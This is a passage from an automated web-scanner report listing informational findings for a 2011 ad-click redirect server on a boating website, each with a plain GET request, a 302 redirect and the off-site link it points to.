Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:49 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/443045219/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/443045219/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/443045219/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:09:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/445245444/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/445245444/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/445245444/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:19:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/455812371/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/455812371/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/455812371/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/457264621/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/457264621/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/457264621/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/462425621/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/462425621/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/462425621/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.407. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/4636261/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/4636261/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/4636261/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/4636261/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/471646028/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/471646028/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.myonlinepubs.com/publication?i=59161

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/471646028/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.myonlinepubs.com/publication?i=59161
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.myonlinepubs.com/publication?i=59161">here</a>
...[SNIP]...

20.409. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488344786/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488344786/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488344786/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488344786/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:10:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488972836/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488972836/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488972836/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:04:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/495614817/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/495614817/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/495614817/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/498236802/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/498236802/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/498236802/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:20 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/503116854/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/503116854/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/503116854/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/504603941/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/504603941/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/504603941/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/505023733/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/505023733/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/505023733/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/506110015/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/506110015/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/506110015/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:06:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/509899444/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

